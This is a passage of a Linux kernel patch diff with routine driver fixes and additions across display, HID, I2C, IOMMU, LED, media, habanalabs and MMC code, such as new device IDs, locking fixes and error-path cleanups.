+@@ -592,11 +554,6 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
+-static const struct soc_device_attribute rcar_du_soc_table[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
+-	{ /* sentinel */ }
+-};
+-
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -688,7 +645,6 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
+-	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -706,10 +662,6 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
+-	soc_attr = soc_device_match(rcar_du_soc_table);
+-	if (soc_attr)
+-		rcdu->info = soc_attr->data;
+-
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index acc3673fefe18..5cfa2bb7ad93d 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,8 +34,6 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
+-#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
+-#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index 789ae9285108e..288eff12b2b1a 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,8 +283,7 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-#define DPLLCR_PLCS0_PLL	(1 << 21)
+-#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
++#define DPLLCR_PLCS0		(1 << 21)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/stm/ltdc.c b/drivers/gpu/drm/stm/ltdc.c
+index 03c6becda795c..b8be4c1db4235 100644
+--- a/drivers/gpu/drm/stm/ltdc.c
++++ b/drivers/gpu/drm/stm/ltdc.c
+@@ -1145,7 +1145,7 @@ static void ltdc_crtc_disable_vblank(struct drm_crtc *crtc)
+ 
+ static int ltdc_crtc_set_crc_source(struct drm_crtc *crtc, const char *source)
+ {
+-	struct ltdc_device *ldev = crtc_to_ltdc(crtc);
++	struct ltdc_device *ldev;
+ 	int ret;
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+@@ -1153,6 +1153,8 @@ static int ltdc_crtc_set_crc_source(struct drm_crtc *crtc, const char *source)
+ 	if (!crtc)
+ 		return -ENODEV;
+ 
++	ldev = crtc_to_ltdc(crtc);
++
+ 	if (source && strcmp(source, "auto") == 0) {
+ 		ldev->crc_active = true;
+ 		ret = regmap_set_bits(ldev->regmap, LTDC_GCR, GCR_CRCEN);
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 0b4204b9a253c..97eefb77f6014 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4403,6 +4403,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC086) },
+ 	{ /* Logitech G903 Hero Gaming Mouse over USB */
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC091) },
++	{ /* Logitech G915 TKL Keyboard over USB */
++	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC343) },
+ 	{ /* Logitech G920 Wheel over USB */
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, USB_DEVICE_ID_LOGITECH_G920_WHEEL),
+ 		.driver_data = HIDPP_QUIRK_CLASS_G920 | HIDPP_QUIRK_FORCE_OUTPUT_REPORTS},
+@@ -4418,6 +4420,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ /* MX5500 keyboard over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb30b),
+ 	  .driver_data = HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS },
++	{ /* Logitech G915 TKL keyboard over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb35f) },
+ 	{ /* M-RCQ142 V470 Cordless Laser Mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb008) },
+ 	{ /* MX Master mouse over Bluetooth */
+diff --git a/drivers/hid/intel-ish-hid/ipc/hw-ish.h b/drivers/hid/intel-ish-hid/ipc/hw-ish.h
+index fc108f19a64c3..e99f3a3c65e15 100644
+--- a/drivers/hid/intel-ish-hid/ipc/hw-ish.h
++++ b/drivers/hid/intel-ish-hid/ipc/hw-ish.h
+@@ -33,6 +33,7 @@
+ #define ADL_N_DEVICE_ID		0x54FC
+ #define RPL_S_DEVICE_ID		0x7A78
+ #define MTL_P_DEVICE_ID		0x7E45
++#define ARL_H_DEVICE_ID		0x7745
+ 
+ #define	REVISION_ID_CHT_A0	0x6
+ #define	REVISION_ID_CHT_Ax_SI	0x0
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 7120b30ac51d0..55cb25038e632 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -44,6 +44,7 @@ static const struct pci_device_id ish_pci_tbl[] = {
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, ADL_N_DEVICE_ID)},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, RPL_S_DEVICE_ID)},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, MTL_P_DEVICE_ID)},
++	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, ARL_H_DEVICE_ID)},
+ 	{0, }
+ };
+ MODULE_DEVICE_TABLE(pci, ish_pci_tbl);
+diff --git a/drivers/i2c/busses/i2c-bcm-iproc.c b/drivers/i2c/busses/i2c-bcm-iproc.c
+index 85d8a6b048856..30a2a3200bed9 100644
+--- a/drivers/i2c/busses/i2c-bcm-iproc.c
++++ b/drivers/i2c/busses/i2c-bcm-iproc.c
+@@ -233,13 +233,14 @@ static inline u32 iproc_i2c_rd_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				   u32 offset)
+ {
+ 	u32 val;
++	unsigned long flags;
+ 
+ 	if (iproc_i2c->idm_base) {
+-		spin_lock(&iproc_i2c->idm_lock);
++		spin_lock_irqsave(&iproc_i2c->idm_lock, flags);
+ 		writel(iproc_i2c->ape_addr_mask,
+ 		       iproc_i2c->idm_base + IDM_CTRL_DIRECT_OFFSET);
+ 		val = readl(iproc_i2c->base + offset);
+-		spin_unlock(&iproc_i2c->idm_lock);
++		spin_unlock_irqrestore(&iproc_i2c->idm_lock, flags);
+ 	} else {
+ 		val = readl(iproc_i2c->base + offset);
+ 	}
+@@ -250,12 +251,14 @@ static inline u32 iproc_i2c_rd_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ static inline void iproc_i2c_wr_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				    u32 offset, u32 val)
+ {
++	unsigned long flags;
++
+ 	if (iproc_i2c->idm_base) {
+-		spin_lock(&iproc_i2c->idm_lock);
++		spin_lock_irqsave(&iproc_i2c->idm_lock, flags);
+ 		writel(iproc_i2c->ape_addr_mask,
+ 		       iproc_i2c->idm_base + IDM_CTRL_DIRECT_OFFSET);
+ 		writel(val, iproc_i2c->base + offset);
+-		spin_unlock(&iproc_i2c->idm_lock);
++		spin_unlock_irqrestore(&iproc_i2c->idm_lock, flags);
+ 	} else {
+ 		writel(val, iproc_i2c->base + offset);
+ 	}
+diff --git a/drivers/i2c/busses/i2c-designware-master.c b/drivers/i2c/busses/i2c-designware-master.c
+index dc3c5a15a95b9..004ccb2d9f369 100644
+--- a/drivers/i2c/busses/i2c-designware-master.c
++++ b/drivers/i2c/busses/i2c-designware-master.c
+@@ -525,9 +525,21 @@ i2c_dw_read(struct dw_i2c_dev *dev)
+ 			u32 flags = msgs[dev->msg_read_idx].flags;
+ 
+ 			regmap_read(dev->map, DW_IC_DATA_CMD, &tmp);
++			tmp &= DW_IC_DATA_CMD_DAT;
+ 			/* Ensure length byte is a valid value */
+-			if (flags & I2C_M_RECV_LEN &&
+-			    (tmp & DW_IC_DATA_CMD_DAT) <= I2C_SMBUS_BLOCK_MAX && tmp > 0) {
++			if (flags & I2C_M_RECV_LEN) {
++				/*
++				 * if IC_EMPTYFIFO_HOLD_MASTER_EN is set, which cannot be
++				 * detected from the registers, the controller can be
++				 * disabled if the STOP bit is set. But it is only set
++				 * after receiving block data response length in
++				 * I2C_FUNC_SMBUS_BLOCK_DATA case. That needs to read
++				 * another byte with STOP bit set when the block data
++				 * response length is invalid to complete the transaction.
++				 */
++				if (!tmp || tmp > I2C_SMBUS_BLOCK_MAX)
++					tmp = 1;
++
+ 				len = i2c_dw_recv_len(dev, tmp);
+ 			}
+ 			*buf++ = tmp;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 8a61bee745a16..14ec9ee8f6f35 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -328,6 +328,14 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 	struct hisi_i2c_controller *ctlr = context;
+ 	u32 int_stat;
+ 
++	/*
++	 * Don't handle the interrupt if cltr->completion is NULL. We may
++	 * reach here because the interrupt is spurious or the transfer is
++	 * started by another port (e.g. firmware) rather than us.
++	 */
++	if (!ctlr->completion)
++		return IRQ_NONE;
++
+ 	int_stat = readl(ctlr->iobase + HISI_I2C_INT_MSTAT);
+ 	hisi_i2c_clear_int(ctlr, int_stat);
+ 	if (!(int_stat & HISI_I2C_INT_ALL))
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 2bc40f957e509..aa469b33ee2ee 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -449,7 +449,7 @@ static int tegra_i2c_init_dma(struct tegra_i2c_dev *i2c_dev)
+ 	if (i2c_dev->is_vi)
+ 		return 0;
+ 
+-	if (!i2c_dev->hw->has_apb_dma) {
++	if (i2c_dev->hw->has_apb_dma) {
+ 		if (!IS_ENABLED(CONFIG_TEGRA20_APB_DMA)) {
+ 			dev_dbg(i2c_dev->dev, "APB DMA support not enabled\n");
+ 			return 0;
+diff --git a/drivers/infiniband/hw/mlx5/qpc.c b/drivers/infiniband/hw/mlx5/qpc.c
+index 542e4c63a8de6..d4e7864c56f18 100644
+--- a/drivers/infiniband/hw/mlx5/qpc.c
++++ b/drivers/infiniband/hw/mlx5/qpc.c
+@@ -297,8 +297,7 @@ int mlx5_core_destroy_qp(struct mlx5_ib_dev *dev, struct mlx5_core_qp *qp)
+ 	MLX5_SET(destroy_qp_in, in, opcode, MLX5_CMD_OP_DESTROY_QP);
+ 	MLX5_SET(destroy_qp_in, in, qpn, qp->qpn);
+ 	MLX5_SET(destroy_qp_in, in, uid, qp->uid);
+-	mlx5_cmd_exec_in(dev->mdev, destroy_qp, in);
+-	return 0;
++	return mlx5_cmd_exec_in(dev->mdev, destroy_qp, in);
+ }
+ 
+ int mlx5_core_set_delay_drop(struct mlx5_ib_dev *dev,
+@@ -548,14 +547,14 @@ int mlx5_core_xrcd_dealloc(struct mlx5_ib_dev *dev, u32 xrcdn)
+ 	return mlx5_cmd_exec_in(dev->mdev, dealloc_xrcd, in);
+ }
+ 
+-static void destroy_rq_tracked(struct mlx5_ib_dev *dev, u32 rqn, u16 uid)
++static int destroy_rq_tracked(struct mlx5_ib_dev *dev, u32 rqn, u16 uid)
+ {
+ 	u32 in[MLX5_ST_SZ_DW(destroy_rq_in)] = {};
+ 
+ 	MLX5_SET(destroy_rq_in, in, opcode, MLX5_CMD_OP_DESTROY_RQ);
+ 	MLX5_SET(destroy_rq_in, in, rqn, rqn);
+ 	MLX5_SET(destroy_rq_in, in, uid, uid);
+-	mlx5_cmd_exec_in(dev->mdev, destroy_rq, in);
++	return mlx5_cmd_exec_in(dev->mdev, destroy_rq, in);
+ }
+ 
+ int mlx5_core_create_rq_tracked(struct mlx5_ib_dev *dev, u32 *in, int inlen,
+@@ -586,8 +585,7 @@ int mlx5_core_destroy_rq_tracked(struct mlx5_ib_dev *dev,
+ 				 struct mlx5_core_qp *rq)
+ {
+ 	destroy_resource_common(dev, rq);
+-	destroy_rq_tracked(dev, rq->qpn, rq->uid);
+-	return 0;
++	return destroy_rq_tracked(dev, rq->qpn, rq->uid);
+ }
+ 
+ static void destroy_sq_tracked(struct mlx5_ib_dev *dev, u32 sqn, u16 uid)
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 5ecc17240eff5..f5e9377b55212 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -172,6 +172,7 @@
+ #define CONTROL_GAINT_EN	29
+ #define CONTROL_XT_EN		50
+ #define CONTROL_INTCAPXT_EN	51
++#define CONTROL_IRTCACHEDIS	59
+ #define CONTROL_SNPAVIC_EN	61
+ 
+ #define CTRL_INV_TO_MASK	(7 << CONTROL_INV_TIMEOUT)
+@@ -708,6 +709,9 @@ struct amd_iommu {
+ 	/* if one, we need to send a completion wait command */
+ 	bool need_sync;
+ 
++	/* true if disable irte caching */
++	bool irtcachedis_enabled;
++
+ 	/* Handle for IOMMU core code */
+ 	struct iommu_device iommu;
+ 
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index b0af8b5967e0d..f6e64c9858021 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -160,6 +160,7 @@ static int amd_iommu_xt_mode = IRQ_REMAP_XAPIC_MODE;
+ static bool amd_iommu_detected;
+ static bool amd_iommu_disabled __initdata;
+ static bool amd_iommu_force_enable __initdata;
++static bool amd_iommu_irtcachedis;
+ static int amd_iommu_target_ivhd_type;
+ 
+ /* Global EFR and EFR2 registers */
+@@ -477,6 +478,9 @@ static void iommu_disable(struct amd_iommu *iommu)
+ 
+ 	/* Disable IOMMU hardware itself */
+ 	iommu_feature_disable(iommu, CONTROL_IOMMU_EN);
++
++	/* Clear IRTE cache disabling bit */
++	iommu_feature_disable(iommu, CONTROL_IRTCACHEDIS);
+ }
+ 
+ /*
+@@ -2700,6 +2704,33 @@ static void iommu_enable_ga(struct amd_iommu *iommu)
+ #endif
+ }
+ 
++static void iommu_disable_irtcachedis(struct amd_iommu *iommu)
++{
++	iommu_feature_disable(iommu, CONTROL_IRTCACHEDIS);
++}
++
++static void iommu_enable_irtcachedis(struct amd_iommu *iommu)
++{
++	u64 ctrl;
++
++	if (!amd_iommu_irtcachedis)
++		return;
++
++	/*
++	 * Note:
++	 * The support for IRTCacheDis feature is dertermined by
++	 * checking if the bit is writable.
++	 */
++	iommu_feature_enable(iommu, CONTROL_IRTCACHEDIS);
++	ctrl = readq(iommu->mmio_base +  MMIO_CONTROL_OFFSET);
++	ctrl &= (1ULL << CONTROL_IRTCACHEDIS);
++	if (ctrl)
++		iommu->irtcachedis_enabled = true;
++	pr_info("iommu%d (%#06x) : IRT cache is %s\n",
++		iommu->index, iommu->devid,
++		iommu->irtcachedis_enabled ? "disabled" : "enabled");
++}
++
+ static void early_enable_iommu(struct amd_iommu *iommu)
+ {
+ 	iommu_disable(iommu);
+@@ -2710,6 +2741,7 @@ static void early_enable_iommu(struct amd_iommu *iommu)
+ 	iommu_set_exclusion_range(iommu);
+ 	iommu_enable_ga(iommu);
+ 	iommu_enable_xt(iommu);
++	iommu_enable_irtcachedis(iommu);
+ 	iommu_enable(iommu);
+ 	iommu_flush_all_caches(iommu);
+ }
+@@ -2760,10 +2792,12 @@ static void early_enable_iommus(void)
+ 		for_each_iommu(iommu) {
+ 			iommu_disable_command_buffer(iommu);
+ 			iommu_disable_event_buffer(iommu);
++			iommu_disable_irtcachedis(iommu);
+ 			iommu_enable_command_buffer(iommu);
+ 			iommu_enable_event_buffer(iommu);
+ 			iommu_enable_ga(iommu);
+ 			iommu_enable_xt(iommu);
++			iommu_enable_irtcachedis(iommu);
+ 			iommu_set_device_table(iommu);
+ 			iommu_flush_all_caches(iommu);
+ 		}
+@@ -3411,6 +3445,8 @@ static int __init parse_amd_iommu_options(char *str)
+ 			amd_iommu_pgtable = AMD_IOMMU_V1;
+ 		} else if (strncmp(str, "pgtbl_v2", 8) == 0) {
+ 			amd_iommu_pgtable = AMD_IOMMU_V2;
++		} else if (strncmp(str, "irtcachedis", 11) == 0) {
++			amd_iommu_irtcachedis = true;
+ 		} else {
+ 			pr_notice("Unknown option - '%s'\n", str);
+ 		}
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index f1c2419334e6f..f85a5d65d1314 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -1112,8 +1112,10 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 		i = 0;
+ 		for_each_available_child_of_node(np, child) {
+ 			ret = lpg_parse_channel(lpg, child, &led->channels[i]);
+-			if (ret < 0)
++			if (ret < 0) {
++				of_node_put(child);
+ 				return ret;
++			}
+ 
+ 			info[i].color_index = led->channels[i]->color;
+ 			info[i].intensity = 0;
+@@ -1291,8 +1293,10 @@ static int lpg_probe(struct platform_device *pdev)
+ 
+ 	for_each_available_child_of_node(pdev->dev.of_node, np) {
+ 		ret = lpg_add_led(lpg, np);
+-		if (ret)
++		if (ret) {
++			of_node_put(np);
+ 			return ret;
++		}
+ 	}
+ 
+ 	for (i = 0; i < lpg->num_channels; i++)
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.c b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+index 47b684b92f817..6beab9e86a22a 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.c
++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+@@ -562,15 +562,17 @@ static int load_requested_vpu(struct mtk_vpu *vpu,
+ int vpu_load_firmware(struct platform_device *pdev)
+ {
+ 	struct mtk_vpu *vpu;
+-	struct device *dev = &pdev->dev;
++	struct device *dev;
+ 	struct vpu_run *run;
+ 	int ret;
+ 
+ 	if (!pdev) {
+-		dev_err(dev, "VPU platform device is invalid\n");
++		pr_err("VPU platform device is invalid\n");
+ 		return -EINVAL;
+ 	}
+ 
++	dev = &pdev->dev;
++
+ 	vpu = platform_get_drvdata(pdev);
+ 	run = &vpu->run;
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe.c b/drivers/media/platform/qcom/camss/camss-vfe.c
+index a26e4a5d87b6b..d8cd9b09c20de 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe.c
+@@ -1540,7 +1540,11 @@ int msm_vfe_register_entities(struct vfe_device *vfe,
+ 		}
+ 
+ 		video_out->ops = &vfe->video_ops;
+-		video_out->bpl_alignment = 8;
++		if (vfe->camss->version == CAMSS_845 ||
++		    vfe->camss->version == CAMSS_8250)
++			video_out->bpl_alignment = 16;
++		else
++			video_out->bpl_alignment = 8;
+ 		video_out->line_based = 0;
+ 		if (i == VFE_LINE_PIX) {
+ 			video_out->bpl_alignment = 16;
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index e0dca445abf14..9ee1b6abd8a05 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -870,6 +870,18 @@ static void device_early_fini(struct hl_device *hdev)
+ 		hdev->asic_funcs->early_fini(hdev);
+ }
+ 
++static bool is_pci_link_healthy(struct hl_device *hdev)
++{
++	u16 vendor_id;
++
++	if (!hdev->pdev)
++		return false;
++
++	pci_read_config_word(hdev->pdev, PCI_VENDOR_ID, &vendor_id);
++
++	return (vendor_id == PCI_VENDOR_ID_HABANALABS);
++}
++
+ static void hl_device_heartbeat(struct work_struct *work)
+ {
+ 	struct hl_device *hdev = container_of(work, struct hl_device,
+@@ -882,7 +894,8 @@ static void hl_device_heartbeat(struct work_struct *work)
+ 		goto reschedule;
+ 
+ 	if (hl_device_operational(hdev, NULL))
+-		dev_err(hdev->dev, "Device heartbeat failed!\n");
++		dev_err(hdev->dev, "Device heartbeat failed! PCI link is %s\n",
++			is_pci_link_healthy(hdev) ? "healthy" : "broken");
+ 
+ 	hl_device_reset(hdev, HL_DRV_RESET_HARD | HL_DRV_RESET_HEARTBEAT);
+ 
+diff --git a/drivers/misc/habanalabs/common/habanalabs.h b/drivers/misc/habanalabs/common/habanalabs.h
+index 58c95b13be69a..257b94cec6248 100644
+--- a/drivers/misc/habanalabs/common/habanalabs.h
++++ b/drivers/misc/habanalabs/common/habanalabs.h
+@@ -34,6 +34,8 @@
+ struct hl_device;
+ struct hl_fpriv;
+ 
++#define PCI_VENDOR_ID_HABANALABS	0x1da3
++
+ /* Use upper bits of mmap offset to store habana driver specific information.
+  * bits[63:59] - Encode mmap type
+  * bits[45:0]  - mmap offset value
+diff --git a/drivers/misc/habanalabs/common/habanalabs_drv.c b/drivers/misc/habanalabs/common/habanalabs_drv.c
+index 112632afe7d53..ae3cab3f4aa55 100644
+--- a/drivers/misc/habanalabs/common/habanalabs_drv.c
++++ b/drivers/misc/habanalabs/common/habanalabs_drv.c
+@@ -54,8 +54,6 @@ module_param(boot_error_status_mask, ulong, 0444);
+ MODULE_PARM_DESC(boot_error_status_mask,
+ 	"Mask of the error status during device CPU boot (If bitX is cleared then error X is masked. Default all 1's)");
+ 
+-#define PCI_VENDOR_ID_HABANALABS	0x1da3
+-
+ #define PCI_IDS_GOYA			0x0001
+ #define PCI_IDS_GAUDI			0x1000
+ #define PCI_IDS_GAUDI_SEC		0x1010
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 498333b769fdb..cdd7f126d4aea 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -2097,14 +2097,14 @@ static void mmc_blk_mq_poll_completion(struct mmc_queue *mq,
+ 	mmc_blk_urgent_bkops(mq, mqrq);
+ }
+ 
+-static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, struct request *req)
++static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, enum mmc_issue_type issue_type)
+ {
+ 	unsigned long flags;
+ 	bool put_card;
+ 
+ 	spin_lock_irqsave(&mq->lock, flags);
+ 
+-	mq->in_flight[mmc_issue_type(mq, req)] -= 1;
++	mq->in_flight[issue_type] -= 1;
+ 
+ 	put_card = (mmc_tot_in_flight(mq) == 0);
+ 
+@@ -2117,6 +2117,7 @@ static void mmc_blk_mq_dec_in_flight(struct mmc_queue *mq, struct request *req)
+ static void mmc_blk_mq_post_req(struct mmc_queue *mq, struct request *req,
+ 				bool can_sleep)
+ {
++	enum mmc_issue_type issue_type = mmc_issue_type(mq, req);
+ 	struct mmc_queue_req *mqrq = req_to_mmc_queue_req(req);
+ 	struct mmc_request *mrq = &mqrq->brq.mrq;
+ 	struct mmc_host *host = mq->card->host;
+@@ -2136,7 +2137,7 @@ static void mmc_blk_mq_post_req(struct mmc_queue *mq, struct request *req,
+ 			blk_mq_complete_request(req);
+ 	}
+ 
+-	mmc_blk_mq_dec_in_flight(mq, req);
++	mmc_blk_mq_dec_in_flight(mq, issue_type);
+ }
+ 
+ void mmc_blk_mq_recovery(struct mmc_queue *mq)
+diff --git a/drivers/mmc/host/sdhci_f_sdh30.c b/drivers/mmc/host/sdhci_f_sdh30.c
+index 6c4f43e112826..7ede74bf37230 100644
+--- a/drivers/mmc/host/sdhci_f_sdh30.c
++++ b/drivers/mmc/host/sdhci_f_sdh30.c
+@@ -26,9 +26,16 @@ struct f_sdhost_priv {
+ 	bool enable_cmd_dat_delay;
+ };
+ 
++static void *sdhci_f_sdhost_priv(struct sdhci_host *host)
++{
++	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
++
++	return sdhci_pltfm_priv(pltfm_host);
++}
++
+ static void sdhci_f_sdh30_soft_voltage_switch(struct sdhci_host *host)
+ {
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
+ 	u32 ctrl = 0;
+ 
+ 	usleep_range(2500, 3000);
+@@ -61,7 +68,7 @@ static unsigned int sdhci_f_sdh30_get_min_clock(struct sdhci_host *host)
+ 
+ static void sdhci_f_sdh30_reset(struct sdhci_host *host, u8 mask)
+ {
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
+ 	u32 ctl;
+ 
+ 	if (sdhci_readw(host, SDHCI_CLOCK_CONTROL) == 0)
+@@ -85,30 +92,32 @@ static const struct sdhci_ops sdhci_f_sdh30_ops = {
+ 	.set_uhs_signaling = sdhci_set_uhs_signaling,
+ };
+ 
++static const struct sdhci_pltfm_data sdhci_f_sdh30_pltfm_data = {
++	.ops = &sdhci_f_sdh30_ops,
++	.quirks = SDHCI_QUIRK_NO_ENDATTR_IN_NOPDESC
++		| SDHCI_QUIRK_INVERTED_WRITE_PROTECT,
++	.quirks2 = SDHCI_QUIRK2_SUPPORT_SINGLE
++		|  SDHCI_QUIRK2_TUNING_WORK_AROUND,
++};
++
+ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ {
+ 	struct sdhci_host *host;
+ 	struct device *dev = &pdev->dev;
+-	int irq, ctrl = 0, ret = 0;
++	int ctrl = 0, ret = 0;
+ 	struct f_sdhost_priv *priv;
++	struct sdhci_pltfm_host *pltfm_host;
+ 	u32 reg = 0;
+ 
+-	irq = platform_get_irq(pdev, 0);
+-	if (irq < 0)
+-		return irq;
+-
+-	host = sdhci_alloc_host(dev, sizeof(struct f_sdhost_priv));
++	host = sdhci_pltfm_init(pdev, &sdhci_f_sdh30_pltfm_data,
++				sizeof(struct f_sdhost_priv));
+ 	if (IS_ERR(host))
+ 		return PTR_ERR(host);
+ 
+-	priv = sdhci_priv(host);
++	pltfm_host = sdhci_priv(host);
++	priv = sdhci_pltfm_priv(pltfm_host);
+ 	priv->dev = dev;
+ 
+-	host->quirks = SDHCI_QUIRK_NO_ENDATTR_IN_NOPDESC |
+-		       SDHCI_QUIRK_INVERTED_WRITE_PROTECT;
+-	host->quirks2 = SDHCI_QUIRK2_SUPPORT_SINGLE |
+-			SDHCI_QUIRK2_TUNING_WORK_AROUND;
+-
+ 	priv->enable_cmd_dat_delay = device_property_read_bool(dev,
+ 						"fujitsu,cmd-dat-delay-select");
+ 
+@@ -116,18 +125,6 @@ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err;
+ 
+-	platform_set_drvdata(pdev, host);
+-
+-	host->hw_name = "f_sdh30";
+-	host->ops = &sdhci_f_sdh30_ops;
+-	host->irq = irq;
+-
+-	host->ioaddr = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(host->ioaddr)) {
+-		ret = PTR_ERR(host->ioaddr);
+-		goto err;
+-	}
+-
+ 	if (dev_of_node(dev)) {
+ 		sdhci_get_of_property(pdev);
+ 
+@@ -182,23 +179,22 @@ err_add_host:
+ err_clk:
+ 	clk_disable_unprepare(priv->clk_iface);
+ err:
+-	sdhci_free_host(host);
++	sdhci_pltfm_free(pdev);
++
+ 	return ret;
+ }
+ 
+ static int sdhci_f_sdh30_remove(struct platform_device *pdev)
+ {
+ 	struct sdhci_host *host = platform_get_drvdata(pdev);
+-	struct f_sdhost_priv *priv = sdhci_priv(host);
+-
+-	sdhci_remove_host(host, readl(host->ioaddr + SDHCI_INT_STATUS) ==
+-			  0xffffffff);
++	struct f_sdhost_priv *priv = sdhci_f_sdhost_priv(host);
++	struct clk *clk_iface = priv->clk_iface;
++	struct clk *clk = priv->clk;
+ 
+-	clk_disable_unprepare(priv->clk_iface);
+-	clk_disable_unprepare(priv->clk);
++	sdhci_pltfm_unregister(pdev);
+ 
+-	sdhci_free_host(host);
+-	platform_set_drvdata(pdev, NULL);
++	clk_disable_unprepare(clk_iface);
++	clk_disable_unprepare(clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mmc/host/wbsd.c b/drivers/mmc/host/wbsd.c
+index 7c7ec8d10232b..b5b1a42ca25e1 100644
